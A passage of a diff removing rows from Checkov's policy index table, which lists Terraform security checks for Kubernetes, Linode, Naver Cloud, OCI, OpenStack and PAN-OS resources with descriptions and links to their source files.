-| 1944 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 1945 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 1946 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) |
-| 1947 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 1948 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 1949 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 1950 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) |
-| 1951 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) |
-| 1952 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) |
-| 1953 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 1954 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 1955 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 1956 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) |
-| 1957 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) |
-| 1958 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) |
-| 1959 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) |
-| 1960 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) |
-| 1961 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) |
-| 1962 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) |
-| 1963 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) |
-| 1964 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) |
-| 1965 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) |
-| 1966 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) |
-| 1967 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) |
-| 1968 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) |
-| 1969 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) |
-| 1970 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) |
-| 1971 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) |
-| 1972 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) |
-| 1973 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) |
-| 1974 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) |
-| 1975 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) |
-| 1976 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) |
-| 1977 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) |
-| 1978 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) |
-| 1979 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) |
-| 1980 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. | Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) |
-| 1981 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) |
-| 1982 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) |
-| 1983 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) |
-| 1984 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) |
-| 1985 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. | Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) |
-| 1986 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) |
-| 1987 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) |
-| 1988 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) |
-| 1989 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) |
-| 1990 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) |
-| 1991 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) |
-| 1992 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) |
-| 1993 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) |
-| 1994 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) |
-| 1995 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) |
-| 1996 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) |
-| 1997 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. | Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) |
-| 1998 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) |
-| 1999 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) |
-| 2000 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) |
-| 2001 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) |
-| 2002 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) |
-| 2003 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) |
-| 2004 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | [InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) |
-| 2005 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) |
-| 2006 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) |
-| 2007 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) |
-| 2008 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) |
-| 2009 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) |
-| 2010 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) |
-| 2011 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | [IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) |
-| 2012 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) |
-| 2013 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) |
-| 2014 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) |
-| 2015 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) |
-| 2016 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) |
-| 2017 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) |
-| 2018 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) |
-| 2019 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) |
-| 2020 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) |
-| 2021 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) |
-| 2022 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) |
-| 2023 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
-| 2024 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
-| 2025 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) |
-| 2026 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) |
-| 2027 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) |
-| 2028 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) |
-| 2029 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) |
-| 2030 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) |
-| 2031 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) |
-| 2032 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) |
-| 2033 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) |
-| 2034 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) |
-| 2035 | CKV_OPENSTACK_3 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress3389.py) |
-| 2036 | CKV_OPENSTACK_4 | resource | openstack_compute_instance_v2 | Ensure that instance does not use basic credentials | Terraform | [ComputeInstanceAdminPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/ComputeInstanceAdminPassword.py) |
-| 2037 | CKV_OPENSTACK_5 | resource | openstack_fw_rule_v1 | Ensure firewall rule set a destination IP | Terraform | [FirewallRuleSetDestinationIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/FirewallRuleSetDestinationIP.py) |
-| 2038 | CKV_PAN_1 | provider | panos | Ensure no hard coded PAN-OS credentials exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/panos/credentials.py) |
-| 2039 | CKV_PAN_2 | resource | panos_management_profile | Ensure plain-text management HTTP is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoHTTP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoHTTP.py) |
-| 2040 | CKV_PAN_3 | resource | panos_management_profile | Ensure plain-text management Telnet is not enabled for an Interface Management Profile | Terraform | [InterfaceMgmtProfileNoTelnet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/InterfaceMgmtProfileNoTelnet.py) |
-| 2041 | CKV_PAN_4 | resource | panos_security_policy | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) |
-| 2042 | CKV_PAN_4 | resource | panos_security_rule_group | Ensure DSRI is not enabled within security policies | Terraform | [PolicyNoDSRI.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoDSRI.py) |
-| 2043 | CKV_PAN_5 | resource | panos_security_policy | Ensure security rules do not have 'applications' set to 'any' | Terraform | 
[PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 2044 | CKV_PAN_5 | resource | panos_security_rule_group | Ensure security rules do not have 'applications' set to 'any' | Terraform | [PolicyNoApplicationAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoApplicationAny.py) | -| 2045 | CKV_PAN_6 | resource | panos_security_policy | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 2046 | CKV_PAN_6 | resource | panos_security_rule_group | Ensure security rules do not have 'services' set to 'any' | Terraform | [PolicyNoServiceAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoServiceAny.py) | -| 2047 | CKV_PAN_7 | resource | panos_security_policy | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 2048 | CKV_PAN_7 | resource | panos_security_rule_group | Ensure security rules do not have 'source_addresses' and 'destination_addresses' both containing values of 'any' | Terraform | [PolicyNoSrcAnyDstAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyNoSrcAnyDstAny.py) | -| 2049 | CKV_PAN_8 | resource | panos_security_policy | Ensure description is populated within security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 2050 | CKV_PAN_8 | resource | panos_security_rule_group | Ensure description is populated within 
security policies | Terraform | [PolicyDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyDescription.py) | -| 2051 | CKV_PAN_9 | resource | panos_security_policy | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 2052 | CKV_PAN_9 | resource | panos_security_rule_group | Ensure a Log Forwarding Profile is selected for each security policy rule | Terraform | [PolicyLogForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLogForwarding.py) | -| 2053 | CKV_PAN_10 | resource | panos_security_policy | Ensure logging at session end is enabled within security policies | Terraform | [PolicyLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/panos/PolicyLoggingEnabled.py) | -| 2054 | CKV_PAN_10 | resource | panos_security_rule_group | Ensure logging at session end is enabled within security policies | 